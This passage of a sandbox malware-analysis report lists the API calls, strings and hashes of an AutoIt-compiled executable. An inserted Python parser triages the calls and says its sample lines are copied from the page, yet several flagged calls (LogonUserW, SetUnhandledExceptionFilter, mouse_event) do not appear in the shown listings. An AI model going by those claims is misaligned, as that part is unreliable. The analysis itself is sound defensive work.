                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction ID: 828f84964bb3b5388eb9a8c734729e380799cbd3d0ba8f312089bd15ff522b42
                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction Fuzzy Hash: 3EC1A7326050974ADF6D863AC47413EFBA16EA27B131E075DD9B3CF1E5EE20C925E620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction ID: fc1163076a6476605917c1afcce2277d59f689cf10d4f9359c0322cb5443d29e
                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction Fuzzy Hash: C3C1A2336051974ADF6D463AC47413EFAA16EA27B131A076ED5B3DB1E4EE20C924F620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: 6909636390c0c3d751931dee37ee810d870c1e821266399ea3afbb09d6ccd4f9
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 15C1A33260519789DF2D463AC47413EFBB17EA27B131A076DD5B3DB2E4EE20C925E620
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 0104785B
                                                                    • DeleteObject.GDI32(00000000), ref: 0104786D
                                                                    • DestroyWindow.USER32 ref: 0104787B
                                                                    • GetDesktopWindow.USER32 ref: 01047895
                                                                    • GetWindowRect.USER32(00000000), ref: 0104789C
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010479DD
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010479ED
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A35
                                                                    • GetClientRect.USER32(00000000,?), ref: 01047A41
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01047A7B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A9D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AB0
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047ABB
                                                                    • GlobalLock.KERNEL32(00000000), ref: 01047AC4
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AD3
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 01047ADC
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AE3
                                                                    • GlobalFree.KERNEL32(00000000), ref: 01047AEE
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047B00
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01062CAC,00000000), ref: 01047B16
                                                                    • GlobalFree.KERNEL32(00000000), ref: 01047B26
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01047B4C
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01047B6B
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047B8D
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047D7A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: c37a9f2f7a44af660b07ce26ccf52f64249d8207492f02abd13c0819def462d1
                                                                    • Instruction ID: 059c0d53508e58d14c64741c19903a7ab2d1ed33f7d319cf8337aadb31676654
                                                                    • Opcode Fuzzy Hash: c37a9f2f7a44af660b07ce26ccf52f64249d8207492f02abd13c0819def462d1
                                                                    • Instruction Fuzzy Hash: 55027FB5900209AFDB14EFA8DC89EAF7BB9FF49310F048159F955AB290C7799D01CB60
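                                                                    The "APIs" entries above list one resolved call per line in a fixed shape (API.MODULE(args), ref: address, optionally prefixed with the subcall it belongs to). The Python below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses those lines into records, decodes the CreateFileW access and disposition arguments, and flags the calls an analyst would look at first (LogonUserW, SetUnhandledExceptionFilter, mouse_event). The sample lines are copied from the listings on this page; the triage notes, the regex and the helper names are the editor's own assumptions, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed input: "APIs" lines copied from the function listings above.
SAMPLE_LINES = """
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,01028389), ref: 010287D1
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FFA12A
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A35
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A9D
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01062CAC,00000000), ref: 01047B16
• DestroyWindow.USER32 ref: 0104787B
  • Part of subcall function 0105A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0105A9ED
"""

# Shape of one entry: optional "Part of subcall function X:" prefix,
# then API.MODULE, optional "(args)", then "ref: ADDRESS". "?" marks an
# argument the plugin could not resolve statically.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: int = 0
    subcall_of: Optional[int] = None  # address of the subcall, if this entry is "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's API lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls


def _hex(arg: str) -> Optional[int]:
    """Unresolved ('?') or non-hex arguments become None instead of raising."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


# Win32 constants (documented values). Only the bits relevant to CreateFileW here.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def describe_createfile(call: ApiCall) -> str:
    """Decode dwDesiredAccess (arg 2) and dwCreationDisposition (arg 5) of a CreateFileW call."""
    if call.api != "CreateFileW" or len(call.args) < 5:
        return ""
    access, disp = _hex(call.args[1]), _hex(call.args[4])
    parts = [name for bit, name in GENERIC_ACCESS.items() if access is not None and access & bit]
    if disp is not None:
        parts.append(DISPOSITION.get(disp, f"disposition 0x{disp:X}"))
    return " | ".join(parts)


# Assumption: the editor's own triage list, chosen from the calls seen on this page.
TRIAGE = {
    "LogonUserW": "validates a username/password against the local SAM or domain; credential material is handled by this process",
    "SetUnhandledExceptionFilter": "installs a top-level exception filter; a common anti-debug trick, since the filter is bypassed while a debugger is attached",
    "mouse_event": "synthesizes mouse input; can fake user interaction to satisfy activity checks",
}


def triage(calls: List[ApiCall]) -> List[Tuple[str, int, str]]:
    """Return (api, ref, note) for every call whose API is on the triage list."""
    return [(c.api, c.ref, TRIAGE[c.api]) for c in calls if c.api in TRIAGE]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for api, ref, note in triage(parsed):
        print(f"{api} @ {ref:08X}: {note}")
    for c in parsed:
        if c.api == "CreateFileW":
            print(f"CreateFileW @ {c.ref:08X}: {describe_createfile(c)}")
```

                                                                    The CreateFileW entry decodes to GENERIC_READ with OPEN_EXISTING, which matches the surrounding GetFileSize/ReadFile/OleLoadPicture sequence: the runtime is reading an existing picture file into a stream, not writing a payload. The flagged LogonUserW and SetUnhandledExceptionFilter entries are the ones worth cross-referencing against the behaviour signatures at the top of the report.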
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,0105F910), ref: 01053627
                                                                    • IsWindowVisible.USER32(?), ref: 0105364B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 4105515805-45149045
                                                                    • Opcode ID: 9f386c7f0cb9c41fd0f281d74b4a47f8d1f67c547dceaf0eac63f5700720cf7e
                                                                    • Instruction ID: 3a5ccc5c3553a8a9c818ed4b72322c837300043b8c1af779f108f007dc293c36
                                                                    • Opcode Fuzzy Hash: 9f386c7f0cb9c41fd0f281d74b4a47f8d1f67c547dceaf0eac63f5700720cf7e
                                                                    • Instruction Fuzzy Hash: B0D16B302083059BCB44FF14C955ABFBBE6BF94394F084459EDC25B3A2DB29E90ADB51
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0105A630
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0105A661
                                                                    • GetSysColor.USER32(0000000F), ref: 0105A66D
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0105A687
                                                                    • SelectObject.GDI32(?,00000000), ref: 0105A696
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0105A6C1
                                                                    • GetSysColor.USER32(00000010), ref: 0105A6C9
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0105A6D0
                                                                    • FrameRect.USER32(?,?,00000000), ref: 0105A6DF
                                                                    • DeleteObject.GDI32(00000000), ref: 0105A6E6
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0105A731
                                                                    • FillRect.USER32(?,?,00000000), ref: 0105A763
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105A78E
                                                                      • Part of subcall function 0105A8CA: GetSysColor.USER32(00000012), ref: 0105A903
                                                                      • Part of subcall function 0105A8CA: SetTextColor.GDI32(?,?), ref: 0105A907
                                                                      • Part of subcall function 0105A8CA: GetSysColorBrush.USER32(0000000F), ref: 0105A91D
                                                                      • Part of subcall function 0105A8CA: GetSysColor.USER32(0000000F), ref: 0105A928
                                                                      • Part of subcall function 0105A8CA: GetSysColor.USER32(00000011), ref: 0105A945
                                                                      • Part of subcall function 0105A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0105A953
                                                                      • Part of subcall function 0105A8CA: SelectObject.GDI32(?,00000000), ref: 0105A964
                                                                      • Part of subcall function 0105A8CA: SetBkColor.GDI32(?,00000000), ref: 0105A96D
                                                                      • Part of subcall function 0105A8CA: SelectObject.GDI32(?,?), ref: 0105A97A
                                                                      • Part of subcall function 0105A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0105A999
                                                                      • Part of subcall function 0105A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0105A9B0
                                                                      • Part of subcall function 0105A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0105A9C5
                                                                      • Part of subcall function 0105A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0105A9ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: e7f0d924ff3d86e9d35e231a79eb25fcadd114bc4984a584aa8c77acbb083826
                                                                    • Instruction ID: 993d6c7c1ed5b96e9102550cdb8b81664754eb4fbebdb0d115e4373fef776143
                                                                    • Opcode Fuzzy Hash: e7f0d924ff3d86e9d35e231a79eb25fcadd114bc4984a584aa8c77acbb083826
                                                                    • Instruction Fuzzy Hash: 29918D72108306EFDB619F64DC08A5B7BE9FF89325F100B19FAA297190D73AD944CB51
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?), ref: 00FD2CA2
                                                                    • DeleteObject.GDI32(00000000), ref: 00FD2CE8
                                                                    • DeleteObject.GDI32(00000000), ref: 00FD2CF3
                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00FD2CFE
                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00FD2D09
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0100C43B
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0100C474
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0100C89D
                                                                      • Part of subcall function 00FD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FD2036,?,00000000,?,?,?,?,00FD16CB,00000000,?), ref: 00FD1B9A
                                                                    • SendMessageW.USER32(?,00001053), ref: 0100C8DA
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0100C8F1
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0100C907
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0100C912
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: 8bc1f3d2d8a3b2475633f74b10959388fa5f57d320651a02bc3bce04a863623e
                                                                    • Instruction ID: 30f6eb9c07c9104225422f32d1019e7e3b2bf448eaec4275fd7ca4f5b9a48f95
                                                                    • Opcode Fuzzy Hash: 8bc1f3d2d8a3b2475633f74b10959388fa5f57d320651a02bc3bce04a863623e
                                                                    • Instruction Fuzzy Hash: 8A12A230504201DFFB66CF28C984BA9BBE1FF44311F5846AAF995CB292C735E881DB91
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 010474DE
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0104759D
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010475DB
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010475ED
                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01047633
                                                                    • GetClientRect.USER32(00000000,?), ref: 0104763F
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01047683
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01047692
                                                                    • GetStockObject.GDI32(00000011), ref: 010476A2
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 010476A6
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010476B6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010476BF
                                                                    • DeleteDC.GDI32(00000000), ref: 010476C8
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010476F4
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0104770B
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01047746
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0104775A
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0104776B
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0104779B
                                                                    • GetStockObject.GDI32(00000011), ref: 010477A6
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010477B1
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010477BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 0f8d9389b6f94cfcaa86fd81012c050645c92dacdfb329f8faadeb8a5319b52e
                                                                    • Instruction ID: 8ed0947c96259ba1adc5369facb9876a7c88b6e949140ae39929ad91907af914
                                                                    • Opcode Fuzzy Hash: 0f8d9389b6f94cfcaa86fd81012c050645c92dacdfb329f8faadeb8a5319b52e
                                                                    • Instruction Fuzzy Hash: 81A170B1A00205BFEB24DBA5DC5AFAF7BB9EB05710F044155FA54AB2D0C7B9AD00CB64
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103AD1E
                                                                    • GetDriveTypeW.KERNEL32(?,0105FAC0,?,\\.\,0105F910), ref: 0103ADFB
                                                                    • SetErrorMode.KERNEL32(00000000,0105FAC0,?,\\.\,0105F910), ref: 0103AF59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 0ed43d6116b5d06861935c32238b7f00196dcd1ad80196c6183a40caa4820c3c
                                                                    • Instruction ID: 82f427ef86258bc7844bac84841cbb1f03aff96073cf68c902e19b882255e01e
                                                                    • Opcode Fuzzy Hash: 0ed43d6116b5d06861935c32238b7f00196dcd1ad80196c6183a40caa4820c3c
                                                                    • Instruction Fuzzy Hash: 7C51FFB4748205EF8B50FB95C882DBEB7A9EFC8600B94895BE4C3EF2D0D6359901DB51
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: f97bd7995758eb9eb9c8d23fc890e25e9eb352fd172a02f3a63cf07222f47fb1
                                                                    • Instruction ID: bf4a30f0ea59163f4c13bcbfe3bc1f77d7574818bb7f48a280028afe6db07749
                                                                    • Opcode Fuzzy Hash: f97bd7995758eb9eb9c8d23fc890e25e9eb352fd172a02f3a63cf07222f47fb1
                                                                    • Instruction Fuzzy Hash: 76815EB16002056ADB11BF25DC52FBF37A9AF04750F084016FE81EA2D2EB74DE05F251
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01059AD2
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01059B8B
                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 01059BA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: 0
                                                                    • API String ID: 2326795674-4108050209
                                                                    • Opcode ID: 90c761f730f5ba9e957a9e374ef507c13f06b818dd2442ea47a231f64129aa49
                                                                    • Instruction ID: b3d5d63c19252ea6fc0dbccc880e91ebf4629ca88122107337ab3476ab8f453f
                                                                    • Opcode Fuzzy Hash: 90c761f730f5ba9e957a9e374ef507c13f06b818dd2442ea47a231f64129aa49
